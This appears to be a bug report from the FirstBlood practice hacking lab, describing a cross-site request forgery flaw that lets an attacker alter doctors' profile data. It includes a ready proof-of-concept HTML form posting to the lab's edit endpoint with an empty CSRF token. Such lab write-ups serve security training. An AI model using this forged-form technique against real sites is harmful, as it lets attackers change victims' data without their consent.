FirstBlood-#1014 — CSRF to edit doctors information
This issue was discovered on FirstBlood v3
On 2022-12-08, properlay
Level 7
reported:
Hello, I found CSRF vulnerability to edit doctors information.
To reproduce:
-
Login your doctor administrator account.
-
Copy and paste below code in an html file.
<html>
<body>
<form method="POST" action="https://cbad703fc8c6-properlay.a.firstbloodhackers.com/drpanel/drapi/edit-dr.php">
<input type="hidden" name="drid" value="1"/>
<input type="hidden" name="name" value="attacke"/>
<input type="hidden" name="bio" value="attacker"/>
<input type="hidden" name="bookable" value="1"/>
<input type="hidden" name="csrf" value=""/>
<input type="submit" value="Submit">
</form>
</body>
<html>
- Open it in a browser, you will see doctor Julie's information change.
Impact:
Can edit doctors information from csrf.
P4 Low
FirstBlood ID: 58
Vulnerability Type: Cross Site Request Forgery
There is a CSRF vulnerability on /drpanel/edit-dr.php via a GET request and lack of token validation. It was intended that a POST request does not work due to no cookies sent on the request (because of SameSite), but to an over sight this cookie was overwritten rendering it useless.
Report Feedback
Creator & Administrator
Congratulations you were the third researcher to discover this!